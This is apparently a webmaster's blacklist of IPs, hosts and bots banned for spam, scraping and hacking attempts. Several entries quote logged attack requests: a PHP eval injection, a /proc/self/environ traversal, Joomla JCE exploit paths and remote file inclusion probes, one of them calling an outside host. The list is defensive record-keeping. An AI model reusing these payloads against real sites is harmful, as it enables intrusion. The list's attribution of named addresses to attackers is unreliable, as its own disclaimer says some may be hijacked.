IP Blacklist


List of Banned IPs, Hosts, and Domains

Also see the list of Banned IP Ranges

The IPs, hosts and domains listed in this table are banned universally from accessing any of my own websites and most of my clients' sites. Some form of bad activity has been seen from the addresses listed.

Bad activity includes: unwanted spiders, rule breakers, comment spammers, trackback spammers, spambots, hacker bots, registration bots and other scripting attackers, harvesters, nuisance spiders, spy bots and organisations spying on websites for commercial reasons.

DISCLAIMER
Please note: being listed on this page does not necessarily mean an IP address, domain name, or any other information is owned by a spammer or hacker. It may have been hijacked from its true owner and used by a spammer or hacker.
IP (Single or Range) Host ID, Company and/or User Agent Reason for Ban
192.167.33.200 Italy Napoli Universita’ Degli Studi Di Napoli Federico Ii Looking for uploadify exploit, mail server
5.101.100.60 Netherlands Amsterdam Digital Ocean Inc. Banned user agent: Mozilla/5.0 (compatible; 200PleaseBot/1.0; +http: //www.200please.com/bot)
130.185.139.213 Denmark Copenhagen Nianet A/s Banned user agent: Riddler (http: //riddler.io/about)
50.203.216.14 United States Bellevue Comcast Cable Communications Holdings Inc Banned user agent: Mozilla/5.0 (compatible; GroupHigh/1.0; +http: //www.grouphigh.com/)
74.15.163.71 Canada Toronto Sympatico Hse Web server
64.150.191.134 United States Overland Park Codero Web server
75.49.158.157 United States Dallas AT&T Internet Services Suspicious user agent – Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; abot v1.2.3.1 http: //code.google.com/p/abot)
212.224.119.178 Germany Frankfurt Am Main First Colo Gmbh Bad bot: Mozilla/5.0 (compatible; XoviBot/2.0; +http://www.xovibot.net/)
69.50.234.132 United States San Jose Nephoscale Inc. MixRankBot – Mozilla/5.0 (compatible; MixrankBot; crawler@mixrank.com). Does not get robots.txt, found honeypot trap file
202.70.136.15 Indonesia Jakarta Departemen Kesehatan Dictionary attacker
217.79.184.51 Germany Kevelaer Computer Andris Kevelaer Banned bot: Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http: //www.majestic12.co.uk/bot.php?+)
212.110.177.137 United Kingdom York Bytemark Computer Consulting Ltd Web hosting server
72.163.217.105 United States San Jose Cisco Systems Inc. Forbidden user agent: curl/7.12.1 (x86_64-redhat-linux-gnu) libcurl/7.12.1 OpenSSL/0.9.7a zlib/1.2.1.2 libidn/0.5.6
50.196.253.34 United States Chicago 2 Asian Brothers Web server
65.129.124.104 United States Boise Qwest Communications Company Llc Comment spammer
98.174.25.29 United States Dallas Cox Communications Inc. Scanning for wp-admin
71.7.190.98 Canada Halifax Eastlink Hsi Scanning for wp-admin
128.30.52.70 United States Cambridge Massachusetts Institute Of Technology W3C_Validator/1.3 http: //validator.w3.org/services
209.191.189.242 United States Bremerton Network Redux Llc Banned bot – BlogSearch/2 +http: //www.icerocket.com/
213.165.190.114 Malta San Giljan Melita Plc Mail/web server
66.135.34.113 United States San Antonio Serverbeach (Peer 1 Network (USA) Inc.,US) Hacker activity
46.29.18.88 Poland Olsztyn Sprint S.a. Spammer
195.122.153.127 United Kingdom London Red-sky Lan Forbidden user agent: python-requests/2.3.0 CPython/2.7.3 Linux/3.14-0.bpo.1-amd64
180.151.36.182 India Bangalore Citycom Networks Pvt Ltd Mail server, dictionary attacker
70.39.246.37 United States Herndon Rhythmic Technologies Inc. Commercial content scraper
95.131.234.7 Malta Valletta Bellnet Vps Services Unidentified bot (no user agent declared) crawled site
203.193.166.228 India Bangalore Software Technology Parks Of India Spammer, web server
76.11.5.114 Canada Halifax Eastlink Unidentified bot tried to crawl site – no user agent declared
46.165.212.110 Germany Frankfurt Am Main Leaseweb Germany Gmbh Spam harvester, mail server
77.166.157.92 Netherlands Amersfoort Koninklijke Kpn N.v. Owlin Bot – feed harvester and rule breaker. Never gets robots.txt
94.228.220.68 Netherlands Amsterdam Netrouting Telecom Hacker activity, no user agent
216.170.115.218 United States Los Angeles Cheapwindowsvps.com Forbidden user agent – Xenu Link Sleuth/1.3.8
69.84.207.246 United States Bakersfield Lightspeed Technologies Bot – LSSRocketCrawler/1.0 LightspeedSystems
198.170.241.46 United States Sterling Ntt America Inc. Looking for /old/wp-admin/, no user agent declared
74.82.40.2 United States San Jose Hurricane Electric Inc. Looking for /wp/wp-admin/, no user agent declared
84.232.217.42 Romania Bucharest Rcs & Rds Residential web server hosting 1 site – tehnicadmin.tk
46.117.48.28 Israel Tel Aviv Nv Bb (NetVision Ltd.,IL) Dictionary attacker
62.108.187.131 Poland Koszalin Technical University Of Koszalin Looking for OsCommerce/ZenCart exploit
204.12.217.210 United States Kansas City Will Divens (WholeSale Internet, Inc.,US) Web server, spammer
89.145.116.4 United Kingdom London Network Eq Ltd Ipv4 Assignment Web server, attempted Joomla JCE editor exploit
31.186.174.155 Netherlands Dronten Totaaldomein Bv Hacker activity – attempting PHP shell exploit – looking for /wso.php
92.60.114.51 United Kingdom Derby Webfusion Internet Solutions Hacker activity – attempting PHP shell exploit – looking for /wso.php
95.92.33.60 Portugal Lisbon Tvcabo Portugal S.a. web server, spammer
77.241.93.168 Belgium Gent Combell Group Nv web server, spammer
79.44.13.245 Italy Milano Nas Dhcp Pool Trieste (Telecom Italia S.p.a.,IT) Dictionary attacker
69.30.243.122 United States Kansas City Nick Koronzo Forbidden user agent – curl/7.21.0 (x86_64-pc-linux-gnu) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.15 libssh2/1.2.6
78.7.44.22 Italy Roma Arch. Salme Dante Dictionary attacker
194.153.113.7 Germany Kassel Ibm Deutschland Gmbh Bad bot – Mozilla/5.0 (compatible; oBot/2.3.1; +http://filterdb.iss.net/crawler/) – rule breaker
208.90.57.196 United States San Jose Cisco Systems Ironport Division Falsely identified web spider
74.213.162.153 Canada Toronto Frontline Hosting Corporation Dictionary attacker, web server
46.36.39.9 Czech Republic Prague Gtt A.s. Forbidden request – /xmlrpc.php, forbidden user agent: PycURL/7.29.0
209.249.5.249 United States Los Angeles Abovenet Communications Inc rogerbot/1.0 (http: //moz.com/help/pro/what-is-rogerbot-, rogerbot-wherecat@moz.com)
70.194.79.229 United States Marseilles Verizon Wireless Dictionary attacker
157.14.187.247 Japan Tokyo Marubeni Access Solutions Inc. Dictionary attacker
198.1.99.213 United States Provo Unified Layer Unidentified bot trying to crawl site. Missing user agent ID. Web server IP, hostname: galaxy.hostdatasecure.com
92.103.79.51 France Paris Montrouge (COMPLETEL SAS France) bot with user agent “mozilla opera”
46.37.6.147 Italy Arezzo Aruba S.p.a. Web hosting server
208.94.232.182 United States South Lake Tahoe Wz Communications Inc. Bad GET request – /wp-content/plugins/mingle-forum/feed.php?topic=all. User Agent: FeedlyBot/1.0 (http: //feedly.com)
94.102.56.236 Netherlands Amsterdam Ecatel Ltd Prolific comment spammer
67.253.117.45 United States Old Town Time Warner Cable Internet Llc Rule breaker bot – ProTech Marketing LLC Spider/v.0.1 (+http://protechmarketingllc.com)
64.22.138.9 United States Pasadena Host Collective Inc. Web server
151.225.91.0 United Kingdom London Sky Broadband Spammer
156.54.59.153 Italy Roma Telecom Italia S.p.a. (Telecomitalia s.p.a.,IT) scanning for uploadify exploit vulnerability
68.193.203.185 United States Ossining Optimum Online spammer/hacker
67.160.99.226 United States Bellevue Comcast Cable Communications Inc Web server – 9 websites hosted
217.115.112.107 Ireland Dublin Sternforth Limited T/a Web World Web server hosting 55 websites
37.16.72.210 France Montreuil Internet Memory Research S.a.s. (Hurricane Electric, Inc.,US) Banned user agent: Mozilla/5.0 (compatible; memoryBot/1.21.14 +http: //mignify.com/bot.html)
80.109.18.233 Austria Vienna Upc Telekabel (Liberty Global Operations B.V.,AT) Web server
50.47.56.138 United States Seattle Frontier Communications Of America Inc. Web server
14.102.97.216 India Delhi World Phone Internet Services Pvt Ltd Spammer
46.193.165.244 France Paris Wifirst S.a.s Comment spammer
192.255.71.137 United States Albany Micfo Llc. Comment spammer
83.170.105.135 United Kingdom London Uk2 – Ltd Web server
80.254.147.236 United Kingdom London Scansafe Lon Banned for spoofing IP
46.29.125.14 France Villeneuve Avenir Telematique S.a.s. Comment spammer
89.110.144.217 Germany Montabaur Netclusive Gmbh Web server IP
213.206.112.80 Netherlands Amsterdam Widexs B.v. Web server/mail server IP
82.39.176.35 United Kingdom Springfield Basildon (Virgin Media Limited,GB) Persistent attempts to log in to WordPress admin
134.255.230.21 Germany Verden Virtual Services 4 You (Dennis Rainer Warnholz,DE) Web server IP
212.152.181.222 Norway Sandnes Jakob Hatteland Solutions As Web server, probing for wp-admin
184.107.197.82 Canada Montreal Qc Media (iWeb Technologies Inc.,CA) Web server
67.59.182.170 United States Newark Hostmysite Web server
77.68.246.90 Denmark Aalborg Bredbaand Nord A/s Web server
81.28.95.125 Netherlands Woerden Redhosting B.v. Web server, dictionary attacker
85.13.144.228 Germany Friedersdorf Neue Medien Muennich Gmbh Web server – dd25732.kasserver.com
82.165.133.103 United States Chesterbrook 1&1 Internet Ag Web server, s16635692.onlinehome-server.info
154.69.121.230 South Africa Pretoria Telkom Sa Ltd Some sort of spider with user agent Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.11) Gecko/20101012 Firefox/3.6.11 GTB7.1 ( .NET CLR 3.5.30729; .NET4.0E)
192.71.55.226 Sweden Stockholm Internetbolaget Hosting In France Faking Googlebot: User agent – Mozilla/5.0 (compatible; Googlebot/2.1; +http: //www.google.com/bot.html)
196.36.32.147 South Africa Randburg The Internet Solution (pty) Ltd Web server – shared by 27 sites
195.200.78.252 France Ecully Informatique On Line Sarl Web server – shared by 29 sites
64.111.26.36 United States Colorado Springs Data 102 Llc Web server
209.44.124.120 Netelligent Hosting Services Inc (Canada Laval Citeglobe) Web server
217.41.0.94 United Kingdom Hillingdon Single Static Ip Addresses Web server
155.133.19.235 Poland Olsztyn Delorian Internet Services Spam registration attempt
199.19.249.196 United Kingdom London Blue Coat Systems Inc Spam registration attempt
212.90.148.93 Germany Minden Goneo Internet Gmbh Spam registration attempt
94.102.56.239 Netherlands Amsterdam Ecatel Ltd Spammer
200.185.235.183 Host: Brazil Sao Paulo Vivo S.a. Faking Googlebot user agent
200.215.14.114 Host: Brasilia Brasil Telecom S/a – Filial Distrito Federal Faking Googlebot user agent
79.169.153.52 Host: Portugal Lisbon Tvcabo Portugal S.a. (Autonomous System,PT) Faking Googlebot user agent
128.204.196.150 Host: Netherlands Amsterdam Snel.com B.v Trying to register on closed site
213.188.134.29 Host: Norway Oslo Active 24 As Looking for Joomla JCE exploit:
1) /images/stories/food.php
2) //images/stories/vito.php
193.136.230.22 Host: Portugal Coimbra Fundacao Para A Ciencia E A Tecnologia I.p. Hacker looking for OpenFlashChart exploit in WordPress SEO Watcher plugin
23.253.73.231 Host: United States Canton Rackspace Cloud Servers
Web server: 1 website – cranecams.com
Hacker / bot attempting PHP eval exploit
/?page=data:,%3C?php%20eval($_GET[a]);%20?%3E&dir=data:,%3C?php%20eval($_GET[a]);%20?%3E&file=data:,%3C?php%20eval($_GET[a]);%20?%3E&asc=data:,%3C?php%20eval($_GET[a]);%20?%3E&inc=data:, PLUS LOTS MORE
41.138.59.21 Hostname: nomade.sahelcom.ne
Host: Niger – Niamey Societe Nigerienne Des Telecommunications
Web server: 1 website – sahelcom.ne
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/barner.gif
72.38.78.210 Hostname: s72-38-78-210.static.comm.cgocable.net
Host: Canada – Burlington Cogeco Cable Inc.
Web server: 2 websites – naturalchoicecleaning.ca, naturalchoicecleaning.com
Hacker attempting web injection attack
/admin/admin.php?view=admin&do=../../../../../../../../../../../../../../../proc/self/environ%00
User agent: libwww-perl/5.805
69.11.119.3 Hostname: 69-11-119-3.sktn.static.sasknet.sk.ca
Host: Canada – Saskatoon Sasktel Wide Area Network Engineering Center
Hacker attempting web injection attack
/admin/admin.php?view=admin&do=../../../../../../../../../../../../../../../proc/self/environ%00
User agent: libwww-perl/5.65
202.29.233.243 Hostname: rh06.hostreflex.com
Host: Thailand – Nakhon Si Thammarat Uninet
Web server: 1 website – kptc.ac.th
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /content/images/stories/food.php?rf
204.188.197.130 Hostname: rh06.hostreflex.com
Host: United States – Bethel Park Sharktech
Web server: 1 website – bbs-hiboux.fr
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
69.36.4.145 Hostname: rh06.hostreflex.com
Host: United States – New York City Jtl Networks Inc.
Web server: 11 websites
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
66.235.180.220 Hostname: ns.domainhosted.com
Host: United States – Rio Linda Hopone Internet Corporation
Web server: 121 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /content/images/stories/food.php?rf
77.109.141.138 Hostname: spftor1e1.privacyfoundation.ch
Host: Netherlands – Amsterdam Init Seven Ag
Comment spammer
88.191.153.199 Hostname: 88-191-153-199.rev.dedibox.fr
Host: France – Lyon Dedibox Sas
Comment spammer
89.145.95.2 Hostname: centro-2.grapeshot.co.uk
Host: United Kingdom – London Grapeshot Ltd
GrapeshotCrawler:
Mozilla/5.0 (compatible; GrapeshotCrawler/2.0; +http://www.grapeshot.co.uk/crawler.php
Mozilla/5.0 (compatible; grapeFX/0.9; crawler@grapeshot.co.uk) libwww/5.4.1
lwp-request/2.07
144.76.78.196 Hostname: static.196.78.76.144.clients.your-server.de
Host: Germany – Nuremberg Hetzner Online Ag
uMBot:
User agent: Mozilla/5.0 (compatible; uMBot-LN/1.0; mailto:
crawling@ubermetrics-technologies.com)
27.255.84.219 Host: Korea, Republic Of – Seoul Ehostidc Brute force dictionary attack on WordPress admin login
208.65.156.45 Hostname: mac1.melodystreet.com
Host: United States – Las Vegas Arogo.net
Web server: 3 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/Pagat.php?rf
199.192.73.75 Host: United States – San Francisco Jonathan Liu Some sort of badly configured bot adding #main-content to the end of every URL
Probably not malicious.
91.142.220.31 Hostname: wirelessgalicia1.vservers.es
Host: Spain – Malaga Axarnet Comunicaciones Sl
Web server: 43 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/vito.php?rf
49.50.8.92 Hostname: ip-50-8-92.masterweb.net
Host: Indonesia – Jakarta Pt Master Web Network
Web server: 169 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
95.222.77.95 Hostname: ip-95-222-77-95.unitymediagroup.de
Host: Germany – Kerpen Unitymedia Nrw Gmbh
Hit site several hundred times in 5 minutes looking for /user/
Some kind of badly scripted bot
User agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Came back with dictionary attack on site admi
80.190.157.7 Hostname: srv235.faber-network.net
Host: Germany – Nuremberg Faber Network Gmbh
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
82.165.131.205 Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 1 website – sulopdfacil.com
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
109.237.81.62 Host: Ukraine – Kiev T.e.s.t. Ltd
Web server: 8 websites
Hacker bot – Looking for wpOnlineStore/osCommerce/Zencart exploit vulnerability:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php
Known hacker botnet user agent:
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
93.185.106.78 Host: Czech Republic – Prague Vshosting S.r.o.
Web server: 15 websites
Hacker bot looking for Joomla OpenFlashChart exploit:
//administrator/components/com_jinc/classes/graphics/tmp-upload-images/lobex21.php?rf
Known hacker botnet user agent: 1) BOT/0.1 (BOT for JCE)
Malicious user agent: libwww-perl/5.837
81.169.212.237 Hostname: h2225003.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 16 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
50.63.85.209 Hostname: ip-50-63-85-209.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 7 websites
Hacker botnet – Dictionary attack on WordPress admin
64.31.25.60 Hostname: 60-25-31-64.static.reverse.lstn.net
Host: United States – Dallas Limestone Networks Inc.
Hacker botnet – Dictionary attack on WordPress admin
188.121.62.249 Hostname: ip-188-121-62-249.ip.secureserver.net
Host: Netherlands – Amsterdam Go Daddy Netherlands B.v.
Web server: 7 websites
Hacker botnet – Dictionary attack on WordPress admin
62.212.130.150 Hostname: srv1.deleukstewinkelsvan.nl
Host: Netherlands – Amsterdam Xenosite B.v.
Web server: 12 websites
Hacker botnet – Dictionary attack on WordPress admin
69.64.65.10 Hostname: 69-64-65-10.dedicated.codero.net
Host: United States – Newport Codero
Web server: 2 websites
Hacker botnet – Dictionary attack on WordPress admin
192.80.146.132 Hostname: sb1.10gen.cc
Host: United States – Los Angeles Enzu Inc
Web server: 12 websites
Hacker botnet – Dictionary attack on WordPress admin
64.34.173.227 Hostname: sb1.10gen.cc
Host: United States – Pacifica Serverbeach
Web server: 12 websites
Hacker botnet – Dictionary attack on WordPress admin
208.113.148.48 Hostname: ps126341.dreamhost.com
Host: United States – Brea New Dream Network Llc
Web server: 19 websites
Hacker botnet – Dictionary attack on WordPress admin
94.120.123.163 Host: Turkey – Istanbul Dogan Tv Digital Platform Isletmeciligi A.s Hacker – Dictionary attack on WordPress admin
112.78.112.235 Hostname: www1895.sakura.ne.jp
Host: Japan – Tokyo Sakura Internet Inc.
Web server: 190 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
108.174.49.212 Hostname: host.colocrossing.com
Host: United States – Chicago Colocrossing
Spammer / spam bot
User Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36
46.32.250.86 Hostname: ds-87151.ds-10.com
Host: United Kingdom – Derby Webfusion Internet Solutions
Web server: 9 websites
Unidentified bot – no user agent
Bad GET requests incl:
/wp-login.php
/administrator/index.php
173.236.42.34 Hostname: host32.server2.vpn999.com
Host: United States – Chicago Singlehop Inc.
Web server: 5 websites
Spammer
49.50.8.21 Hostname: ip-50-8-21.masterweb.net
Host: Indonesia – Jakarta Pt Master Web Network
Web server: 139 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/bonek.php?rf
216.194.8.46 Hostname: 216-194-8-46.ny.ny.metconnect.net
Host: United States – Brooklyn Mettel Inc.
Web server: 17 websites
Hacker botnet – Dictionary attack on WordPress admin
50.63.141.164 Hostname: ip-50-63-141-164.ip.secureserver.net
Host: United States – Scottsdale Godaddy.com Llc
Web server: 2 websites
Hacker botnet – Dictionary attack on WordPress admin
64.62.191.199 Host: United States – Fremont Hurricane Electric Inc.
Web server: 15 websites
Hacker botnet – Dictionary attack on WordPress admin
207.182.143.114 Hostname: 72.8f.b6.static.xlhost.com
Host: United States – Columbus Xlhost.com Inc
Banned bot: niki-bot
Web scraper, rule breaker
205.237.206.226 Hostname: mdv-206-226.dotnt.com
Host: United States – South Portland Ethernext Inc.
Web server: 10 websites
Hacker – looking for multiple exploits.
DoS type attacker – hit site around 3000 times in 15 minutes
Examples:
/w-agora_path/reorder_forums.php
/wapchat/src/eng.adCreate.php
/vwebmail/includes/mailaccess/pop3/core.php
/vp/configure.php
/web/Administration/Includes/configureText.php
/wbxml/WBXML/Decoder.php
MANY MORE
106.187.47.170 Hostname: ebismacau.com
Host: Japan – Tokyo Linode Llc
Web server: 4 websites
Hacker botnet – Dictionary attack on WordPress admin
103.6.237.67 Host: Malaysia – Seri Kembangan Block 1 Mtdc Server Farm Complex
Web server: 11 websites
Hacker botnet – Dictionary attack on WordPress admin
63.245.169.229 Hostname: 63-245-169-229.ip.lrmutual.com
Host: United States – Little River Mutual Telephone Company
Web server: 1 website – usd444.com
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
87.106.177.97 Hostname: s16586209.onlinehome-server.info
Host: Germany – Karlsruhe 1&1 Internet Ag
Web server: 28 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
94.20.222.39 Host: Azerbaijan Baku Delta Telecom Ltd Hacker – Dictionary attack on WordPress admin
93.180.68.68 Hostname: firewall.vhosting.pcextreme.nl
Host: Netherlands – Middelburg Pcextreme B.v. (Appears this IP is actually Bulgaria)
Hacker: Remote File Inclusion attempt / WordPress timthumb RFI exploit:
/wp-content/themes/thesis_185/lib/scripts/thumb.php?src=http: //picasa.com.lichti.ca/bat.php
188.40.69.204 Hostname: server.dietpatch4u.com
Host: Germany – Nuremberg Hetzner Online Ag
Web server: 16 websites
Comment spammer – Spam bot
91.230.195.208 Hostname: reverse-91-230-195-208.icnhost.net
Host: Bulgaria – Internet Corporated Networks Ltd
Web server: 10 websites
Hacker – looking for admin exploits
/wp-login.php
/administrator/index.php
66.147.244.110 Hostname: box810.bluehost.com
Host: United States – Provo Unified Layer
Web server: 3653 websites
Hacker – looking for vulnerable WordPress plugins
85.214.33.181 Hostname: h2229297.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 3 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
137.110.244.139 Hostname: integromedb-crawler.integromedb.org
Host: United States – San Diego University Of California San Diego
Banned bot: www .integromedb.org/Crawler
209.252.31.244 Hostname: 209-252-31-244.ip.mcleodusa.net
Host: United States – Fairport Paetec Communications Inc.
Web server: 1 website – eclipsemold.com
Bad GET request
/articles”class=”url”data-dot=”url”>graphicline.co.za/articles/a>/div>/div>/div>script>JAK.Fulltext.ResultScreenshotResize(“
187.33.253.23 Hostname: reverso.23.reverso.com
Host: Brazil – Joao Pessoa Sitecnet Informatica Ltda
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) /images/stories/food.php?rf
96.43.128.2 Host: United States – Kansas City Joe’s Datacenter Llc
Web server: 1 website – actuallyforsale.com
Suspicious user agent: Ruby
84.99.35.51 Hostname: 51.35.99.84.rev.sfr.net
Host: France – Paris Societe Francaise Du Radiotelephone S.a.
Scraper bot
Malicious user agent: Java/1.6.0_25
46.105.103.66 Hostname: server1.cnetweb.co.uk
Host: France – Roubaix Ovh Systems
Web server: 63 websites
Hacker bot scanning for shell RFI exploits
1) /includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http: //www.google.com/humans.txt?
2) /index.php?CONFIG[MWCHAT_Libs]=http: //www.google.com/humans.txt?
3) /nukebrowser.php?filnavn=http://www.google.com/humans.txt?filhead=http: //www.google.com/humans.txt?&cmd=id
4) /index.php?ConfigDir=http: //www.google.com/humans.txt?
6) /modules/Forums/admin/admin_styles.php?phpbb_root_path=http: //www.google.com/humans.txt?
7) /sendstudio/admin/includes/createemails.inc.php?ROOTDIR=http: //www.google.com/humans.txt?
8) /inhalt.php?dateien[news]=http: //www.google.com/humans.txt?
9) /index.php?AML_opensite=http: //www.google.com/humans.txt?
10) /NuclearBB/tasks/send_queued_emails.php?root_path=http: //www.google.com/humans.txt?
Many others
No user agent
137.110.244.137 Host: United States – San Diego University Of California San Diego
Web server: 3 websites – biologicalnetworks.net biologicalnetworks.org integromedb.org
Banned bot: www .integromedb.org/Crawler
119.31.234.193 Hostname: server.strivesolutions.biz
Host: Singapore – Singapore Vodien Internet Solutions Pte Ltd
Web server: 87 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
85.214.205.155 Hostname: server12.rz.jubatus.de
Host: Germany – Berlin Strato Ag
Web server: 118 websites
Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
2) //images/stories/explore.gif
78.158.11.226 Hostname: cl-78-158-11-226.fastlink.lt
Host: Lithuania – Vilnius Uab Consilium Optimum
Banned bot: Lynx/2.8.5rel.1 libwww-FM/2.15FC SSL-MM/1.4.1c OpenSSL/0.9.7e-dev
93.51.142.19 Host: Italy – Milano Next Step Soluzioni Hacker bot looking for Joomla JCE exploit:
Known hacker botnet user agents:
1) BOT/0.1 (BOT for JCE)
Examples:
1) /index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&
version=1576&cid=20
85.214.140.220 Hostname: h1791140.stratoserver.net
Host: Germany – Berlin Strato Ag
Web server: 76 websites
Hacker bot looking for Joomla JCE exploit:
Example:
1) //images/stories/explore.gif
162.72.248.149 Host: United States – Englewood Viasat Communications Inc. Some sort of bot trawling for images
Doesn’t identify itself as a bot
78.46.79.195 Host: Germany – Nuremberg Hetzner Online Ag
Web server: 58 websites
Hacker bot scanning for Open Flash Chart exploits
//components/com_jnews/includes/openflashchart/tmp-upload-images/guys.php?rf
Malicious and known hacker botnet user agents:
1) libwww-perl/5.805
2) Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6
97.79.238.33 Hostname: gvo23833.gvodatacenter.com
Host: United States – Concord Time Warner Cable Internet Llc
Web server: 628 websites
Hacker bot looking for Joomla JCE exploit:
